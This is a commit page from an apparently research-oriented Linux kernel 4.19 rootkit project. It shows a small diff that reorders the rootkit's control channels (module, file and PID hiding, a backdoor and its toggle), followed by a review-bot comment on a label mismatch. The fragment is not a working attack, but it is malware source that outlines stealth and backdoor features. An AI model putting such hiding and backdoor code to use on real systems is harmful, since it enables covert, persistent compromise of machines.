linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit ea5efa1605af85654ed4c91cfd15f51cbc983466
parent ab51a89125ebad2454b244bbabda8cc5f6ccc264
Author: deurzen <m.deurzen@tum.de>
Date:   Sun,  6 Dec 2020 15:34:08 +0100

reorders channels in report

Diffstat:
Msrc/channel.c | 4++--
1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -27,9 +27,9 @@ report_channels(void)
 DEBUG_NOTICE("%-24s %#10lx\n", "MODHIDE", G7_MODHIDE);
 DEBUG_NOTICE("%-24s %#10lx\n", "FILEHIDE", G7_FILEHIDE);
 DEBUG_NOTICE("%-24s %#10lx\n", "OPENHIDE", G7_OPENHIDE);
+ DEBUG_NOTICE("%-24s %#10lx\n", "HIDEPID", G7_PIDHIDE);
 DEBUG_NOTICE("%-24s %#10lx\n", "BACKDOOR", G7_BACKDOOR);
 DEBUG_NOTICE("%-24s %#10lx\n", "TOGGLEBD", G7_TOGGLEBD);
- DEBUG_NOTICE("%-24s %#10lx\n", "HIDEPID", G7_PIDHIDE);
 DEBUG_NOTICE("-----------------------------------\n");
 }
@@ -41,9 +41,9 @@ detect_channel(unsigned cmd)
 case G7_MODHIDE: return (channel_t){ "MODHIDE", handle_modhide };
 case G7_FILEHIDE: return (channel_t){ "FILEHIDE", handle_filehide };
 case G7_OPENHIDE: return (channel_t){ "OPENHIDE", handle_openhide };
+ case G7_PIDHIDE: return (channel_t){ "HIDEPID", handle_pidhide };
 case G7_BACKDOOR: return (channel_t){ "BACKDOOR", handle_backdoor };
 case G7_TOGGLEBD: return (channel_t){ "TOGGLEBD", handle_togglebd };
- case G7_PIDHIDE: return (channel_t){ "HIDEPID", handle_pidhide };
 }
 return (channel_t){ "unknown", NULL };
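Review bot: The label printed for G7_PIDHIDE in report_channels is `"HIDEPID"`, while every other visible entry uses the suffix of its constant (`"MODHIDE"`, `"FILEHIDE"`, `"OPENHIDE"`), so the report disagrees with the constant and handler names for this one channel. The same string appears in the `case G7_PIDHIDE:` line of detect_channel in the second hunk. If the mismatch is unintentional, both lines would read `"PIDHIDE"`; if it is deliberate, a short comment should say so. Because the two functions repeat the same list and this commit aligns their order by hand, a comment such as `/* keep order and labels in sync with detect_channel() */` above the report lines would document the coupling. Both function bodies start outside the hunks, so entries before MODHIDE are not visible here.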